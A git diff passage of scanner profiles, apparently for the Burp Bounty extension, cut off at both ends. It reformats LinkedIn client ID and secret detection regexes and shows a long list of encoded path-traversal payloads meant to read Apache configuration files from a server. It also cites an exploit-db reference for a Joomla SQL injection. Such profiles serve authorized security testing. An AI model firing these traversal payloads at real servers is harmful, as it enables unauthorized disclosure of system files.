\"com_artforms\" component SQL Injection:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/4386/", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/LinkedIn_Client_ID.bb b/profiles/LinkedIn_Client_ID.bb old mode 100644 new mode 100755 index 7b10d29..b444ad2 --- a/profiles/LinkedIn_Client_ID.bb +++ b/profiles/LinkedIn_Client_ID.bb @@ -1 +1,59 @@ -[{"Name":"LinkedIn_Client_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)linkedin(.{0,20})?(?-i)[\u0027\\\"][0-9a-z]{12}[\u0027\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"LinkedIn Client Id","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "LinkedIn_Client_ID", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)linkedin(.{0,20})?(?-i)[\u0027\\\"][0-9a-z]{12}[\u0027\\\"]" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "LinkedIn Client Id", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/LinkedIn_Secret.bb b/profiles/LinkedIn_Secret.bb old mode 100644 new mode 100755 index fa260d3..8ccb85d --- a/profiles/LinkedIn_Secret.bb +++ b/profiles/LinkedIn_Secret.bb @@ -1 +1,59 @@ -[{"Name":"LinkedIn_Secret","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)linkedin(.{0,20})?[\u0027\\\"][0-9a-z]{16}[\u0027\\\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"LinkedIn Secret","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "LinkedIn_Secret", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)linkedin(.{0,20})?[\u0027\\\"][0-9a-z]{16}[\u0027\\\"]" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "LinkedIn Secret", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-Apache2-conf.bb b/profiles/Linux-Apache2-conf.bb index e871424..451c411 100755 --- a/profiles/Linux-Apache2-conf.bb +++ b/profiles/Linux-Apache2-conf.bb @@ -1 +1,950 @@ -[{"Name":"Linux-Apache2-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}","..%c1%9c{FILE}","..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}","%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}","%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}","..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}","%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}","%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}","%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}","..%%35%63{FILE}","..%%35%63..%%35%63{FILE}","..%%35%63..%%35%63..%%35%63{FILE}","..%%35%63